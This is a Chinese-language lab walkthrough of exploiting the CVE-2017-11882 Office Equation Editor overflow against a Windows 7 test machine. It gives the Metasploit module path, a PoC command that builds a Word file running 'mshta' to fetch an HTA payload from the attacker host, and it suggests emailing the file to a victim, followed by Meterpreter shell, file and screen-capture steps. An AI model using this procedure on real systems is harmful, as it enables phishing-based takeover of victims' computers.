一、CVE-2017-11882漏洞概述
目前,利用该漏洞可以通杀office 2003至office 2016所有版本,影响office版本有:
office 2003
office 2007
office 2010
office 2013
office 2016
漏洞产生原因是:由于Office软件里面的 [公式编辑器] 造成的,由于编辑器进程没有对名称长度进行校验,导致缓冲区溢出,攻击者通过构造特殊的字符,可以实现任意代码执行。
用途:利用这个漏洞,可以构造带有shell后门的office文件,当普通用户打开这个office文件,则电脑可以被攻击者直接控制。
二、实验过程
1、实验环境 (所有安装环境分享在我的网盘中链接:https://pan.baidu.com/s/1bUWiAyAMSaUfzIhdEgYEOw 提取码:a45i )
渗透机:Kali Linux + PoC测试代码(可在网盘中找到)
靶机:win7 + office 2016
2、实验过程
CVE:漏洞信息库
PoC:漏洞测试代码。(全称: Proof of Concept), 又叫概念验证。作为我们的漏洞验证程序,他可能是一段不完整的程序,仅仅是为了证明我们提出漏洞的观点。使用编写好的 PoC 去验证测试目标是否存在着漏洞。常用python编写。
HTA是HTML应用程序(HTML Application)的缩写,
使用PoC代码将URL插入到hta文件并生成doc文件。
2.1 进入metasploit框架
2.2 搜索需要的攻击模块并使用
/usr/share/metasploit-framework/modules/exploits/windows/fileformat/office_word_hta.rb
2.3 使用exploit命令进行渗透,开始监听。
2.4 生成带命令的doc文件
python Command109b_CVE-2017-11882.py -c "mshta http://192.168.57.128:8080/default.hta" -o test.doc
2.5 将生成的1.doc压缩后通过邮件发送给win 7系统的用户,被攻击者接收了邮件并打开。
在win7 系统用户打开该Word文件后,可在渗透机观察到已经监听到了一个session。2查看session, 进入会话。
2.7 进入会话后,用metepreter对会话进行管理,可使用help命令查看metepreter的常用命令。例如,可用shell命令进入到靶机的系统。
进入到靶机系统中后,我们可对靶机的文件进行增删改查等操作,此时靶机已被控制。
此外,还可以查看靶机的系统信息等,
还可以截取靶机的屏幕进行查看,
此时可以观察到靶机用户正在浏览的屏幕信息。
3、由于目前office软件的普遍使用,为避免遭到攻击,最方的方法就是及时更新系统。。。。。。完